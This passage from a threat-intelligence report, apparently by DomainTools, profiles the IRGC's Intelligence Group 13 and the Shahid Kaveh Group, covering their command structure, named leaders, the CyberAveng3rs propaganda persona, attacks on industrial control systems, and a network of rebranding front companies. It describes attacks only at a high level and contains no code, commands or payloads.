The group, (pronounced: Team-e Ettela'ati-ye Sizdah), takes its name from Mohammad Kaveh, an IRGC commander who was martyred during the Iran-Iraq War in 1986 at the age of 25. He led elite IRGC operations in Kurdistan and Western Iran and was viewed as a revolutionary model for sacrifice, bravery, and obedience. In keeping with the IRGC’s broader ideological tradition, the title “Shahid” (شهید), meaning martyr, is commonly affixed to the names of operational units, serving both as an homage to fallen commanders and a deliberate invocation of religious-nationalist symbolism. This naming convention reinforces the ideological continuity between the IRGC’s early revolutionary battles and its modern digital warfare initiatives. By invoking martyrdom, such units portray their operations not merely as tactical missions but as sacred continuations of a historical and spiritual struggle. The Shahid Kaveh Group draws directly from this legacy to infuse its cyber operations with ideological legitimacy and emotional resonance. The archived site kaveh313[.]lxb[.]ir hosted tributes, biographical stories, and hagiographic imagery that inform the spiritual framework for the group’s name and mission, blending religious devotion, revolutionary ethos, and digital militarism into a unified operational identity.

IRGC Cyber Command Hierarchy

The Islamic Revolutionary Guard Corps (IRGC) oversees a complex and multi-tiered cyber command architecture designed to fulfill distinct yet interconnected missions across domestic security, intelligence collection, and global offensive operations. This structure is deliberately compartmentalized, allowing the IRGC to conduct covert campaigns while maintaining plausible deniability through the use of proxy units, contractors, and front companies. At the core of this system is the Shahid Kaveh Group, an elite offensive cyber unit that operates with both ideological fervor and technical precision. Intelligence Group 13, its most active tactical team, is fully embedded within this command, drawing operational directives from a triad of IRGC oversight bodies:

• The Electronic Warfare and Cyber Defense Organization (EWCD), which coordinates cyber defense and internal sabotage capabilities,
  
• The Intelligence Organization (IO), responsible for domestic surveillance and strategic targeting intelligence, and
  
• The Quds Force (QF), which projects IRGC influence and cyber aggression abroad, particularly through specialized units like Unit 300 and Unit 600.
  

Together, these divisions provide the Shahid Kaveh Group,and by extension Intelligence Group 13, with the operational cover, intelligence feeds, and strategic alignment necessary to wage hybrid cyber warfare across physical and psychological domains.

Command Structure – Known Figures

The leadership behind Intelligence Group 13 reflects a blend of strategic IRGC command, operational direction, and industrial integration. At the top sits Hamidreza Lashgarian, a senior IRGC cyber official with confirmed affiliations to both the Electronic Warfare and Cyber Defense Organization (EWCD) and Quds Force Unit 300. Lashgarian is widely regarded as the supervisory figure behind the Shahid Kaveh Group, providing overarching guidance on both ideological framing and operational tempo. Beneath him, Reza Salarvand serves as the direct commander of Intelligence Group 13, identified in dissident leaks as the group’s tactical leader and field-level coordinator. Salarvand’s role includes managing target selection, overseeing cyber intrusion campaigns, and aligning Team 13’s actions with IRGC strategic objectives. Supporting these military units is Mohammad Bagher Shirinkar, a key figure embedded in EWCD-linked contractor firms. Shirinkar plays a critical role in bridging the IRGC’s internal operations with its broader technical ecosystem, facilitating tool development, subcontractor oversight, and deniable operational capabilities through civilian-facing fronts.

IRGC High-Level Hierarchy

Placement of Intelligence Group 13 Within IRGC Cyber Org

Intelligence Group 13 functions as the operational spearhead of the Shahid Kaveh Group, a hybrid entity positioned at the intersection of the IRGC’s cyber warfare and Quds Force portfolios. This structural alignment gives Team 13 a unique dual mandate: to execute precision cyber intrusions with military-grade sophistication while simultaneously engaging in psychological and ideological warfare. As a tactical APT (Advanced Persistent Threat) cell, the unit specializes in cyber reconnaissance, disruptive sabotage of critical infrastructure, and the deployment of malware designed to pre-position effects across adversarial networks. Its proximity to both IRGC Electronic Warfare and Cyber Defense (EWCD) and external-facing Quds Force units enables Intelligence Group 13 to operate with both deep access and strategic reach, making it a central instrument of Iran’s asymmetric cyber doctrine.

Internal Chain of Command

Technical Mission and Tactics

The strategic mandate of Intelligence Group 13 centers on disrupting critical infrastructure and shaping adversarial perceptions through covert digital operations. The unit has demonstrated a specific focus on targeting industrial control systems (ICS), including Unitronics PLCs, Israeli electrical grids, U.S. water treatment facilities, and fuel distribution systems, all selected for their high-impact potential and symbolic value. Their campaigns often involve pre-positioning malware, embedding implants within target environments well in advance of activation to enable dormant or timed sabotage. Complementing these efforts is an aggressive intelligence collection posture, relying on phishing, credential theft, and OSINT harvesting to support intrusion planning and post-access operations. Crucially, Team 13 integrates psychological warfare into its strategy, disseminating screenshots, leaks, and taunting messages through propaganda arms like CyberAveng3rs to generate fear, confusion, and reputational damage in tandem with technical effects.

Disinformation & Propaganda: The Role of CyberAveng3rs Patriotic Hacker Wing

CyberAveng3rs serves as the psychological warfare and influence operations extension of Intelligence Group 13, functioning not as an independent actor but as a deliberately constructed propaganda arm embedded within Iran’s cyber doctrine. Rather than remaining in the shadows like traditional APTs, Team 13 leverages CyberAveng3rs to publicize and amplify the psychological impact of its technical operations,turning covert intrusions into open spectacles of defiance. Through Telegram channels, Instagram accounts,and diaspora-linked echo networks, CyberAveng3rs publishes defacement screenshots, malware control panel captures, and operational taunts directed at Western and Israeli infrastructure targets. These narratives are often laced with religious-nationalist motifs, martyr quotes, and anti-Zionist rhetoric, reinforcing the IRGC’s ideological messaging. CyberAveng3rs is not merely reactive; it issues pre-attack warnings, brags post-operation, and threatens future campaigns, making it a key instrument for intimidation, distraction, and symbolic escalation. By fusing information operations with hacking campaigns, it enhances the IRGC’s ability to wage cognitive warfare alongside technical compromise.

Operator: Mr. Soul (Mr_Soulcy)

• Known handles:
  
  • Instagram: Cyberaveng3rs
    
  • Telegram: @CyberAveng3rs
    
  • X @cyberaveng3rs
    
• Notable content:
  
  • Claimed the Aliquippa water system attack (PA, USA)
    
  • Leaked Unitronics control panel screenshots
    
  • Issued threats of “Operation IV” aimed at Israeli cybersecurity units
    
  • Branded style includes martyr quotes, Islamic slogans, and ICS interfaces
    

Contractor and Front Company Ecosystem

The IRGC’s cyber operations rely heavily on a dense and evolving ecosystem of affiliated companies, some covertly managed through military intermediaries, others openly registered as “cyber defense,” “AI research,” or “IT solutions” firms. This web serves multiple strategic purposes. First, it allows the IRGC to outsource technical labor and scale operations without overexposing its formal personnel. Second, it provides plausible deniability, as these front firms can operate under civilian-facing banners while conducting state-directed offensive cyber activities. Third, it enables a rotating model of corporate obfuscation, where companies like Emen Net Pasargad are dissolved or sanctioned only to reappear under new names like Ayandeh Sazan Sepehr Aria, often with overlapping staff and clients. These firms are frequently staffed by IRGC veterans or relatives of high-ranking cyber officials, further blurring the lines between state, contractor, and covert operator.

This model closely parallels revelations from the i-SOON (安洵) data leak, which exposed how China’s Ministry of Public Security (MPS) and provincial security bureaus have long contracted out cyber operations to nominally private firms. Like the IRGC’s cyber complex, Chinese firms such as i-SOON and Chengdu 404 maintain the veneer of legitimate enterprise while developing spyware, managing fake persona farms, and carrying out state-sponsored intrusions. In both Iran and China, this hybrid public-private structure allows state entities to mask state cyber activity behind corporate fronts, maintain flexibility, and engage in offensive campaigns without bearing the full diplomatic cost.

Moreover, just as Iran’s firms like Cyberban Institute and Kavosh Center double as ideological and technical platforms, Chinese contractors often support both domestic surveillance and global espionage, engaging in infrastructure targeting, data exfiltration, and information control under the guise of national innovation. This convergence of state-backed ideology, cyber warfare, and privatized labor reveals a shared authoritarian blueprint: One in which cyber capabilities are cultivated through semi-privatized ecosystems designed to insulate command structures while enabling scalable, deniable aggression in the global digital theater.

Expanded Corporate Ecosystem Supporting IRGC Cyber Ops

The IRGC’s cyber capabilities rely not solely on military or intelligence personnel but on an expansive and deliberately obscured ecosystem of contracting companies, technical institutes, and shell entities that function as both operational extensions and recruitment/talent pipelines. These firms play a crucial role in sustaining the IRGC’s cyber warfare doctrine, developing malware, testing exploits, maintaining infrastructure, and providing a legal or commercial façade for offensive operations.

What makes these companies particularly effective, and elusive, is the way they straddle the boundary between legitimacy and subversion. Many of them present as cybersecurity vendors, AI startups, or educational technology labs, marketing themselves to civilian, academic, and even international clients. Behind the scenes, however, they serve as contractors for the IRGC’s Electronic Warfare and Cyber Defense Organization (EWCD), Intelligence Organization (IO), and Quds Force, executing tasks that range from infrastructure reconnaissance and SIGINT analysis to psychological warfare and influence ops.

This system is both resilient and adaptive. Companies are frequently rebranded, dissolved, or split into subsidiaries following public exposure or sanctions. For instance, Net Peygard Samavat, once exposed for its involvement in Iranian state cyber operations, later became Emen Net Pasargad, which itself was reconstituted as Ayandeh Sazan Sepehr Aria. Despite their changing names and corporate registrations, these entities retain the same personnel, mission scope, and government sponsors, effectively outlasting sanction regimes and Western takedown efforts.

Moreover, the personnel who operate these firms often rotate between IRGC intelligence positions, academic research roles, and private-sector leadership, creating a feedback loop where state doctrine, technical innovation, and civilian infrastructure become interwoven. This also creates a recruitment channel: Young developers and engineers are often brought into these companies under the banner of patriotic service or career opportunity, then quietly integrated into national-level cyber missions.

In effect, these firms function as force multipliers for Iran’s cyber program. They provide scalability, deniability, and a legal buffer between the Iranian state and its digital aggression. As international scrutiny tightens, the IRGC is likely to continue leaning on these corporate proxies to advance technical capability while avoiding direct attribution,mirroring similar models seen in China (e.g., i-SOON) and Russia (e.g., contractors like NTC Vulkan).

Below is a detailed examination of these key companies and their connections.

Core Contractor Entities and Their Functions

• Emen Net Pasargad (ایمن‌نت پاسارگاد) – Once a flagship contractor for disinformation and foreign interference (e.g., impersonating the Proud Boys during the 2020 U.S. election). Dissolved in 2023. Sanctions Source
  
• Ayandeh Sazan Sepehr Aria (آریا سپهر سازان آینده) – A successor to Emen Net, continuing operations in information operations and malware development. Founded by Mohammad Bagher Shirinkar. Recorded Future
  
• Mahak Rayan Afraz (محک رایان افراز) – Specialized in AI and surveillance tooling, including:
  
  • Hazm – Persian NLP engine
    
  • Gol Rokh – Facial recognition platform
    
  • Disbanded in mid-2023 amid U.S. pressure. Treasury
    
• DSPRI (موسسه سنجش داده پیشرفته) – Linked to IRGC Quds Force Unit 300, DSPRI handles signal interception and encrypted traffic decryption, including battlefield deployments in Syria, Lebanon, and Iraq. Recorded Future, p. 14
  
• Sabrin Kish (شرکت صابرین کیش) – Developed sniffers and ICS tools sold to IRGC clients; also engaged in foreign contracts (e.g., deal with Iraq’s NSA head Faleh al-Fayyadh). Maintains financial and corporate overlap with IRGC Cooperative Foundation. Wikipedia
  
• Soroush Saman Co. (شرکت توسعه الکترونیکی و مخابراتی سروش سامان) – Supplied surveillance and tracking systems to Hezbollah, and built AI-based phone surveillance for Unit 300. [IntelliTimes coverage via Lab Dookhtegan]
  
• Afkar Systems (افکار سیستم) – Tied to Nemesis Kitten APT, allegedly led by Ahmad Khatibi Aghda. Operated through Center 2060 and Cyber Base 2000, both under EWCD’s umbrella. CISA Advisory
  
• Parnian Telecommunication (شرکت الکترونیکی و مخابراتی پرنیان) – Facilitates cyber workforce recruitment for IRGC and MRA-linked projects. Job ads call for infosec and penetration testing expertise. Recorded Future, p. 19
  
• Kavosh Center (مرکز کاوش) – Offensive R&D hub tied to the Shahid Kaveh Group. Led by IRGC affiliate “Shayan” (Malek Mohammadi Nejad). Possibly involved in TTP development and APT tool testing. Recorded Future
  
• Cyberban Institute (موسسه سایبربان) – Run by Mehdi Lashgarian, nephew of IRGC cyber leader Hamidreza Lashgarian. This front publishes ideological content, disinfo narratives, and tech analysis favorable to IRGC doctrine. Recorded Future, p. 22
  

Observations on Structure and Strategy

The structure and behavior of IRGC-affiliated cyber firms reveal a deliberate and adaptive operational model. Many of these companies engage in strategic rebranding, dissolving or renaming themselves after being sanctioned or exposed, Net Peygard reemerged as Emen Net, which later became Ayandeh Sazan, while Dehkadeh Telecom transitioned into Mahak Rayan Afraz, with a new identity likely forthcoming. These transitions help avoid regulatory scrutiny while maintaining operational continuity. Furthermore, interlocking leadership is a hallmark of the ecosystem: Figures such as Mohammad Bagher Shirinkar, Hamidreza Lashgarian, and Esmail Rahimi appear across multiple entities, indicating a centralized and tightly coordinated management structure. The ecosystem also supports technology transfer abroad, with tools and capabilities exported to IRGC-aligned actors in Iraq, Syria, and Lebanon, particularly via Quds Force Unit 300. Notably, these firms are often the technical and logistical backends for known APT groups. For example, Afkar Systems underpins Nemesis Kitten, Mahak Rayan Afraz has links to Tortoiseshell (TA456), and clusters tied to the Shahid Kaveh Group appear to support Pioneer Kitten operations.

Operational Forecast and Strategic Implications

Intelligence Group 13 functions as the operational core of the IRGC’s cyber disruption strategy, a convergence point where technical sabotage, psychological warfare, and revolutionary ideology are seamlessly integrated. Operating under the umbrella of the Shahid Kaveh Group, Team 13 is not an independent or freelance actor but a disciplined tactical cell embedded in a broader, multi-layered command system overseen by IRGC EWCD, IO, and Quds Force divisions. Its mission is augmented through propaganda arms such as CyberAveng3rs, which act not only as amplifiers of defacement and intrusion campaigns but also as strategic influence assets projecting IRGC narratives into public and geopolitical consciousness.

The group’s tradecraft spans traditional APT techniques, such as credential harvesting, critical infrastructure penetration (e.g., Unitronics PLCs, fuel pump logic, and water treatment systems), and covert malware deployment (e.g., IOControl, Project Binder). Yet what sets Team 13 apart is its parallel investment in symbolic messaging, issuing threats via Telegram, leaking screenshots via Instagram handles like @mr.sul.ir, and invoking martyrdom and Islamic resistance to create a psychological echo chamber around each technical act.

This entire operation is scaffolded by a front company and contractor ecosystem designed to provide deniability, talent, infrastructure, and logistical support. These include Afkar Systems (linked to Nemesis Kitten), Mahak Rayan Afraz (associated with TA456), and Kavosh Center (supporting Pioneer Kitten), among others. These firms are part of a strategy of institutional layering and rebranding, allowing the IRGC to rotate through corporate identities while sustaining long-term capabilities. Rebranding paths such as Net Peygard → Emen Net → Ayandeh Sazan show how the IRGC evades sanctions without losing operational momentum.

Key Takeaways:

• Intelligence Group 13 is a deeply embedded extension of the IRGC’s strategic cyber doctrine,not an isolated threat actor.
  
• Psychological operations are prioritized on par with malware deployment, reflecting a dual mission of technical and perceptual warfare.
  
• The martyrdom framework (e.g., naming conventions like “Shahid Kaveh”) plays a pivotal role in unifying cyber actions with ideological legitimacy.
  
• The use of contractor ecosystems and front companies provides flexibility, plausible deniability, and continuity across sanctions and takedowns.
  

Risk Assessment:

Future campaigns by Intelligence Group 13 and its affiliates are likely to blend cyber-kinetic threats with narrative manipulation, targeting not just critical infrastructure but public perception and institutional trust. This includes:

• Threatening or disrupting civilian infrastructure in the U.S., Israel, and Gulf States
  
• Deploying psychological campaigns through channels like CyberAveng3rs, timed with physical intrusions
  
• Leveraging rebranded contractors to deliver tooling and intelligence capabilities both domestically and to proxy forces abroad (e.g., Hezbollah, PMF in Iraq)
  

Defending against this threat requires not only technical hardening but cognitive resilience, recognizing that the IRGC’s cyber ambitions are as much about controlling the story as they are about breaching the network.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.